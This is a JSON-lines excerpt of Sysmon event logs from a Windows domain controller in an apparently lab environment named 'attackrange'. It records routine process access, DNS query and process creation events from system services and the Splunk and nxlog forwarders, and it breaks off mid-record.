{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1902,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1903,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.017\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001032690300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.017","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001032690300}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":1904,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.022\r\nProcessGuid: {41C8662E-1F61-5F25-0000-001010540000}\r\nProcessId: 864\r\nQueryName: win-dc-6178966\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.022","ProcessGuid":"{41C8662E-1F61-5F25-0000-001010540000}","QueryName":"win-dc-6178966","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":1905,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.172\r\nProcessGuid: {41C8662E-1F73-5F25-0000-00108BBC0200}\r\nProcessId: 2884\r\nQueryName: win-dc-6178966\r\nQueryStatus: 0\r\nQueryResults: 10.0.1.14;\r\nImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.172","ProcessGuid":"{41C8662E-1F73-5F25-0000-00108BBC0200}","QueryName":"win-dc-6178966","QueryStatus":"0","QueryResults":"10.0.1.14;","Image":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":1906,"ProcessID":2804,"ThreadID":3344,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.573\r\nProcessGuid: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nProcessId: 2384\r\nQueryName: win-dc-6178966.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.573","ProcessGuid":"{41C8662E-1F73-5F25-0000-001054BF0200}","QueryName":"win-dc-6178966.attackrange.local","QueryStatus":"0","QueryResults":"fe80::286a:52de:ea43:8266;::ffff:10.0.1.14;","Image":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1907,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.236\r\nSourceProcessGUID: {41C8662E-1F76-5F25-0000-001028C90300}\r\nSourceProcessId: 3948\r\nSourceThreadId: 2692\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001063C20200}\r\nTargetProcessId: 2488\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.236","SourceProcessGUID":"{41C8662E-1F76-5F25-0000-001028C90300}","SourceProcessId":"3948","SourceThreadId":"2692","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001063C20200}","TargetProcessId":"2488","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1908,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.236\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-001028C90300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.236","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-001028C90300}","TargetProcessId":"3948","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1909,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.294\r\nProcessGuid: {41C8662E-1F76-5F25-0000-0010CCD60300}\r\nProcessId: 4028\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nParentProcessId: 3824\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.294","ProcessGuid":"{41C8662E-1F76-5F25-0000-0010CCD60300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-00106CC50300}","ParentProcessId":"3824","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1910,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-00106CC50300}\r\nSourceProcessId: 3824\r\nSourceThreadId: 3888\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-0010CCD60300}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-00106CC50300}","SourceProcessId":"3824","SourceThreadId":"3888","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-0010CCD60300}","TargetProcessId":"4028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+403f8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+404c7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40fee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+13671|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1815e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1911,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F76-5F25-0000-0010CCD60300}\r\nTargetProcessId: 4028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F76-5F25-0000-0010CCD60300}","TargetProcessId":"4028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:26","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1912,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:26.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:26.283","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 